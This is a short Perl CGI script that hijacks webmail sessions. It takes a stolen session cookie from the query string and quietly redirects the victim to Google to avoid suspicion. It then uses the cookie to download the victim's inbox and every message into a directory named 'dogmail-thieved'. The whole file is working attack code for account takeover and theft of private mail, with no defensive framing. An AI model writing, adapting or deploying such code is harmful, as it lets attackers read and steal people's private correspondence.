#!/usr/bin/perl

# the bulk of the work could be spawned into the background thereby immediately
# redirecting the victim (makes the process less suspicious).

use HTTP::Cookies;
use LWP::UserAgent;

print "Content-type: text/html\n\n";
print "<meta http-equiv=\"refresh\" content=\"0; url=http://www.google.com\">";
$logdir = "/www/html/dogmail-thieved";

$ENV{'HTTP_REFERER'} =~ /http:\/\/(\w+\.)?(\w+\.com)\/MBX\/(.*)\/ID/;
$domain = $2;
$userid = $3;

$ENV{'HTTP_REFERER'} =~ /(.*MBX\/\w*\/)/;
$inbox_url = $1;

($key, $value) = split /=/, $ENV{QUERY_STRING};

$cookie = new HTTP::Cookies;
$agent  = new LWP::UserAgent;

$cookie->set_cookie(
    0,                   # version
    $key,                # key
    $value,              # value
    "/",                 # patch
    $domain,             # domain
    80, 0, 0, 999999, 0  # port, path_spec, secure, maxage, discard
);


$agent->cookie_jar($cookie);
$response = $agent->get($inbox_url);

if ($response->is_success) {
    @message_list = split /\n/, $response->content;        
    $date = `date +%m-%d-%y`; chomp $date;    open  FD, ">$logdir/$userid-$date";
    print FD $response->content;
    close FD;    
    for ($i = 0; $i <= $#message_list; $i++) {
        if ($message_list[$i] =~ /<!a href="\/MBX\/$userid\/(.*)\/(.*)">/) {
            $fid = "$1"; $mid = "$2";            $message = $agent->get("$inbox_url/$fid/$mid");
                        mkdir "$logdir/MBX";
            mkdir "$logdir/MBX/$userid";
            mkdir "$logdir/MBX/$userid/$fid";
                        open  FD, ">$logdir/MBX/$userid/$fid/$mid";
            print FD $message->content;
            close FD;
        }
    }
}